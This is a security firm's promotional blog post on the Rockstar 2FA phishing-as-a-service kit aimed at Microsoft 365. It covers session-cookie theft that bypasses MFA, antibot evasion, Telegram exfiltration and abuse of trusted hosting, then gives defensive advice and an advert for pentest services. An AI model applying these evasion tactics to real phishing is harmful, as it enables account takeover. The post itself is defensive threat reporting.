Phishing-as-a-Service (PhaaS): “Rockstar 2FA” Targets Microsoft 365 with AiTM Attacks

Cybercriminals are escalating their attacks using a sophisticated Phishing-as-a-Service (PhaaS) toolkit called Rockstar 2FA, specifically designed to target Microsoft 365 users. Despite the presence of multi-factor authentication (MFA), attackers bypass it using Adversary-in-the-Middle (AiTM) techniques. 😱

🔎 Key Takeaway: Even with MFA enabled, organizations are vulnerable to credential theft and session hijacking via AiTM attacks.

🚨 AiTM Attacks: Rockstar 2FA intercepts user credentials and session cookies, making MFA obsolete in protecting accounts.💻 Subscription-Based PhaaS: Available for rent at $200 for two weeks or $350 per month, this toolkit enables even non-technical attackers to launch large-scale phishing campaigns.📊 Modern Admin Panel: Offers a user-friendly interface for customizing phishing campaigns, tracking their performance, and generating malicious URLs.

🛡️ 2FA Bypass: Steals session cookies to bypass two-factor authentication. 🍪 Cookie Harvesting: Captures critical data for unauthorized access. 👾 Antibot Protection: Integrates Cloudflare Turnstile to block automated security scans. 📋 Customizable Themes: Mimics legitimate login pages (e.g., Microsoft, Google) to deceive victims. 🤖 Telegram Bot Integration: Automatically sends stolen credentials to the attacker in real time.

The phishing campaigns employ multiple vectors to lure victims:

🔗 URLs & QR Codes: Embedded in emails appearing as file-sharing requests or e-signature prompts.📎 Document Attachments: Malicious .HTM files designed to mimic legitimate Microsoft 365 login forms.🔗 Link Redirectors: Use trusted services like Google Docs Viewer, Atlassian Confluence, and Microsoft OneNote to host phishing links and bypass spam filters.

💡 Pro Tip: Always verify the URL before entering your credentials, especially for Microsoft 365 or any cloud service.

Rockstar 2FA leverages trusted platforms to host its phishing pages, increasing the chances of bypassing security checks:

🌐 Google Docs Viewer📂 Microsoft OneDrive & Dynamics 365🧩 Atlassian Confluence

🔍 What Makes It Dangerous? The phishing pages are designed to replicate the official login portals of popular brands, tricking users into entering their credentials. These details are instantly sent to the attacker’s AiTM server.

A similar campaign, dubbed Beluga, uses .HTM attachments to steal Microsoft OneDrive credentials. Victims unknowingly provide their information, which is exfiltrated to a Telegram bot.

Additionally, phishing links are being disguised as betting games on social media, luring users with promises of quick financial gains, only to steal their personal and financial data.

💸 Real-World Impact: Some victims have reported losing over $10,000 to these scams.

🔒 Best Practices to Stay Safe from PhaaS Attacks:

Enable Conditional Access: Use adaptive MFA that considers device and location-based signals.Regular Penetration Testing: Hire experts like Wire Tor to simulate attacks and identify vulnerabilities in your infrastructure.Educate Your Team: Conduct regular training sessions on identifying phishing attempts.Use Anti-Phishing Tools: Implement email filtering solutions that detect and block malicious links.Monitor Login Activity: Watch for suspicious sign-ins, especially from unknown locations or devices.

At Wire Tor, we specialize in protecting organizations from Phishing-as-a-Service (PhaaS) threats and AiTM attacks. Our penetration testing services help you:

🔍 Detect vulnerabilities before attackers do. 🔒 Secure Microsoft 365 accounts against advanced phishing techniques. ⚙️ Enhance your security posture with actionable insights and recommendations.

💥 Reach Before Breach with Wire Tor!

🚨 Contact Wire Tor Pentest today and safeguard your organization from evolving cyber threats.